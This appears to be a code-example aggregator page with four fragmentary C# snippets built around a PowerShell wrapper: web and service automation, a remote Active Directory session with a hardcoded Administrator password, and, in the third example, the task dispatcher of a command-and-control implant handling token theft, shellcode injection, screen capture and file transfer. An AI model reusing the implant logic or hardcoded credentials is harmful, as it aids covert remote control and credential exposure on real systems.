Esempio n. 1
        protected void btnDLL_Click(object sender, EventArgs e)
            Powershell oPowershell = new Powershell();
            Log        oLog        = new Log(0, dsn);
            List <PowershellParameter> powershell = new List <PowershellParameter>();

            powershell.Add(new PowershellParameter("path", "C:"));
            List <PowershellParameter> results = oPowershell.Execute(Request.PhysicalApplicationPath + "scripts\\test.ps1", powershell, oLog, "DEV");

            foreach (PowershellParameter result in results)
                Response.Write(result.Name + " = " + result.Value + "<br/>");
Esempio n. 2
        public static void Main(string[] args)
            Dictionary <string, string> par = new Dictionary <string, string>();

            par.Add("UserPrincipalName", "*****@*****.**");

            var ps = new Powershell();

            ps.CreateRemoteSession("TESTAD0\\Administrator", "Games4Free", "");
            var ad = new AD(ps);
            //   ad.CreateOrgranization("N***a" , new Dictionary<string, string>());
            var ret = ps.Execute("Get-ADDomain");

            /* ps.CloseRemoteSession();
             * var ret1 = ps.Execute("Get-ADDomain");*/
Esempio n. 3
        /// <summary>
        /// Handle a new task.
        /// </summary>
        /// <param name="implant">The CaramelImplant we're handling a task for</param>
        public void DispatchTask(SCImplant implant)
            if (this.command == "cd")
                Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
            else if (this.command == "download")
                Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
                Download.Execute(this, implant);
            else if (this.command == "execute_assembly")
                Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
                Tasks.ExecAssembly.Execute(this, implant);
            else if (this.command == "exit")
                Debug.WriteLine("[-] DispatchTask - Tasked to exit");
                Exit.Execute(this, implant);
            else if (this.command == "jobs")
                Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
                Jobs.Execute(this, implant);
            else if (this.command == "jobkill")
                Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
                Jobs.Execute(this, implant);
            else if (this.command == "kill")
                Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
            else if (this.command == "ls")
                string path = this.@params;
                Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
                DirectoryList.Execute(this, implant);
            else if (this.command == "make_token")
                Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + [email protected](' ')[0]);
            else if (this.command == "ps")
                Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
            else if (this.command == "powershell")
                Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
            else if (this.command == "rev2self")
                Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
            else if (this.command == "run")
                Debug.WriteLine("[-] DispatchTask - Tasked to start process");
                Proc.Execute(this, implant);
            else if (this.command == "screencapture")
                Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
                ScreenCapture.Execute(this, implant);
            else if (this.command == "shell")
                Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
                Proc.Execute(this, implant);
            else if (this.command == "shinject")
                Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
            else if (this.command == "sleep")
                    int sleep = Convert.ToInt32(this.@params);
                    Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
                    implant.sleep = sleep * 1000;
                    this.status   = "complete";
                    Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
                    this.status  = "error";
                    this.message = "Please provide an integer value";
            else if (this.command == "spawn")
                Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
            else if (this.command == "steal_token")
                Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
            else if (this.command == "upload")
                Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
                Upload.Execute(this, implant);

Esempio n. 4
        public void NonShared()
            //// Initiate Timer
            //int intTimeout = 10;    // minutes for all registrations
            //if (Debug)
            //    oEventLog.WriteEntry(String.Format("Starting Avamar Registration Thread."), EventLogEntryType.Information);
            //Timeout timeout = new Timeout(TimeoutType.Minutes, intTimeout, oEventLog, Debug);
            //ThreadStart tTimeoutStart = new ThreadStart(timeout.Begin);
            //Thread tTimeout = new Thread(tTimeoutStart);

                this.Starter.NonSharedStorage = true;

                // Setup Classes
                Servers          oServer          = new Servers(0, dsn);
                OperatingSystems oOperatingSystem = new OperatingSystems(0, dsn);
                Log oLog = new Log(0, dsn);

                DataSet dsNew = oServer.GetStorageConfigured();
                if (dsNew.Tables[0].Rows.Count > 0)
                    foreach (DataRow drNew in dsNew.Tables[0].Rows)
                        int    intServer = Int32.Parse(drNew["id"].ToString());
                        int    intOS     = Int32.Parse(drNew["osid"].ToString());
                        int    intAnswer = Int32.Parse(drNew["answerid"].ToString());
                        int    intNumber = Int32.Parse(drNew["number"].ToString());
                        string Name      = drNew["servername"].ToString();
                        string IP        = drNew["ipaddress"].ToString();

                        if (oOperatingSystem.IsWindows(intOS) || oOperatingSystem.IsWindows2008(intOS))
                            // First, check to make sure it's available (pinging) in DNS
                            //bool InDNS = false;
                            //Ping Ping = new Ping();
                            //string PingStatus = "";
                            //    PingReply Reply = Ping.Send(Name);
                            //    PingStatus = Reply.Status.ToString().ToUpper();
                            //    if (PingStatus == "SUCCESS")
                            //    {
                            //        InDNS = true;
                            //        break;
                            //    }
                            //catch { }

                            //if (InDNS)
                            // Serverprocessing.ps1 -AnswerID 26622 -ServerNumber 1 –Environment "Albert_Dev" –IPAddressToConnect  "" – ConfigureNonSharedStorage -Log
                            string command = "Serverprocessing.ps1 -AnswerID " + intAnswer.ToString() + " -ServerNumber " + intNumber.ToString() + " –Environment \"" + this.Starter.ScriptEnvironment + "\" –IPAddressToConnect  \"" + IP + "\" – ConfigureNonSharedStorage -Log";
                            oLog.AddEvent(intAnswer, Name, "Non-shared storage", "Starting automated script (" + command + ")...", LoggingType.Debug);

                            string error = "";
                                List <PowershellParameter> powershell = new List <PowershellParameter>();
                                Powershell oPowershell = new Powershell();
                                powershell.Add(new PowershellParameter("AnswerID", intAnswer.ToString()));
                                powershell.Add(new PowershellParameter("ServerNumber", intNumber.ToString()));
                                powershell.Add(new PowershellParameter("Environment", this.Starter.ScriptEnvironment));
                                powershell.Add(new PowershellParameter("IPAddressToConnect", IP));
                                powershell.Add(new PowershellParameter("ConfigureNonSharedStorage", null));
                                powershell.Add(new PowershellParameter("Log", null));
                                List <PowershellParameter> results = oPowershell.Execute(this.Starter.strScripts + "\\Serverprocessing.ps1", powershell, oLog, Name);
                                oLog.AddEvent(intAnswer, Name, "Non-shared storage", "Powershell script completed!", LoggingType.Debug);
                                bool PowerShellError = false;
                                foreach (PowershellParameter result in results)
                                    oLog.AddEvent(intAnswer, Name, "Non-shared storage", "PSOBJECT: " + result.Name + " = " + result.Value, LoggingType.Information);
                                    if (result.Name == "ResultCode" && result.Value.ToString() != "0")
                                        PowerShellError = true;
                                    else if (result.Name == "Message" && PowerShellError)
                                        error = result.Value.ToString();
                            catch (Exception exPowershell)
                                error = exPowershell.Message;

                            if (String.IsNullOrEmpty(error))
                                oServer.UpdateStorageConfigured(intServer, DateTime.Now.ToString());
                                oLog.AddEvent(intAnswer, Name, "", error, LoggingType.Error);
                                oServer.AddError(0, 0, 0, intServer, 99991, error);
                            //    oLog.AddEvent(intAnswer, Name, "Non-shared storage", "DNS is not registered yet...", LoggingType.Debug);
                            oServer.UpdateStorageConfigured(intServer, DateTime.Now.ToString());
            catch (Exception ex)
                string error = ex.Message + " ~ (Source: " + ex.Source + ") (Stack Trace: " + ex.StackTrace + ")";
                oEventLog.WriteEntry(error, EventLogEntryType.Error);
                this.Starter.NonSharedStorage = false;
                //timeout.StopIt = true;  // Kill timeout thread.